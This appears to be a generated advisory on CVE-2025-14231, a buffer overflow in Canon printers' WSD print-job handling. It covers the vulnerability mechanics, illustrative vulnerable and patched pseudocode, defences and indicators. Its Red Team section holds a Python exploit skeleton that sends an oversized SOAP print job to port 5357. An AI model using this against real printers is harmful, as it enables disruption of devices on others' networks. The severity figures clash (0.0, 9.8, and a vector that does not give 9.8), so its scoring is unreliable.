CVE-2025-14231
Executive Summary
CVE-2025-14231 is a critical buffer overflow vulnerability in the Web Services on Devices (WSD) print job processing component of multiple Canon Small Office Multifunction Printers and Laser Printers. The flaw allows an unauthenticated attacker on the same network segment to trigger a denial of service (device unresponsive) or achieve arbitrary code execution by sending a specially crafted print job. The vulnerability affects firmware version v06.02 and earlier across several product lines sold in Japan, the US, and Europe. No public exploit or patch is currently available, but the risk is elevated due to the network-accessible attack vector and lack of authentication requirements.

Supply Chain & Package Security
This vulnerability is not related to software supply chain packages (NPM, PyPI, Go, Ruby). It is a firmware-level issue in Canon’s embedded printer software.
CVSS Breakdown & Threat Level
- CVSS Score: 0.0 (NVD placeholder)
- Assessed Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Attack Vector (AV): Adjacent Network – attacker must be on the same network segment.
- Attack Complexity (AC): Low – no special conditions required.
- Privileges Required (PR): None – no authentication needed.
- User Interaction (UI): None – no user action required.
- Scope (S): Unchanged – exploitation does not affect other components.
- Confidentiality (C): High – potential for arbitrary code execution leading to data exfiltration.
- Integrity (I): High – attacker can modify device firmware or settings.
- Availability (A): High – device can be rendered unresponsive.
Threat Level: Critical (9.8) – due to remote code execution potential and lack of authentication.
Deep Dive & Mechanics
The vulnerability resides in the WSD (Web Services on Devices) protocol handler used for print job submission. WSD is a Microsoft-standard protocol for network device discovery and communication. Canon’s implementation fails to properly validate the size of incoming print job data before copying it into a fixed-size buffer. An attacker can craft a WSD print job with a payload exceeding the buffer capacity, causing a stack-based buffer overflow (CWE-121). This overflow can overwrite critical memory regions, including return addresses and function pointers, enabling arbitrary code execution in the context of the printer’s firmware.
The attack is initiated by sending a malicious WSD print job to the printer’s IP address on port 5357 (default WSD port). The printer processes the job without authentication, leading to the overflow. Successful exploitation can allow the attacker to install persistent malware, exfiltrate printed documents, or use the printer as a pivot point within the network.
Vulnerable vs. Patched Code
No patched code is available. The vulnerable code is in the WSD print job parsing routine. A hypothetical fix would involve bounds checking on the input buffer before memory copy operations.
Vulnerable Code (pseudo):
void process_wsd_print_job(char *input, int size) {
char buffer[256];
// No bounds check
memcpy(buffer, input, size);
// Process buffer...
}
Patched Code (hypothetical):
void process_wsd_print_job(char *input, int size) {
char buffer[256];
if (size > sizeof(buffer)) {
// Reject oversized job
return;
}
memcpy(buffer, input, size);
// Process buffer...
}
Exploitation & Lab Setup
Red Team (Exploitation)
No public exploit code is available. However, a proof-of-concept can be developed using Python and the socket library to send a crafted WSD print job.
Lab Setup:
- Target: Canon printer with firmware v06.02 (e.g., Satera LBP670C Series).
- Attacker: Linux machine on the same network segment.
- Tools: Python 3, Scapy (optional), Wireshark for traffic analysis.
Exploit Skeleton (Python):
import socket
target_ip = "192.168.1.100"
port = 5357
# Craft oversized WSD print job payload
payload = b"A" * 512 # Overflow buffer
# Build minimal WSD SOAP envelope (simplified)
soap_envelope = b"""<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<PrintJob xmlns="http://schemas.microsoft.com/windows/2006/08/printing/wsd">
<JobData>""" + payload + b"""</JobData>
</PrintJob>
</soap:Body>
</soap:Envelope>"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, port))
sock.send(soap_envelope)
sock.close()
Note: This is a simplified example. Real exploitation requires precise buffer offset calculation and shellcode injection.
Blue Team (Defense)
- Network Segmentation: Isolate printers on a separate VLAN with strict firewall rules blocking WSD traffic (port 5357) from untrusted hosts.
- Monitoring: Detect anomalous WSD traffic patterns, especially oversized print jobs.
- Firmware Updates: Apply vendor patches as soon as they become available.
- Disable WSD: If not required, disable WSD on the printer via its web interface or SNMP.
Indicators of Compromise (IOCs)
- Network Traffic: Unusually large WSD print jobs (payload > 256 bytes) on port 5357.
- Logs: Printer logs showing repeated connection attempts from a single IP or malformed SOAP requests.
- System Behavior: Printer becomes unresponsive, reboots unexpectedly, or exhibits erratic behavior.
- File Hashes: No known malware hashes yet; monitor for new firmware modifications.
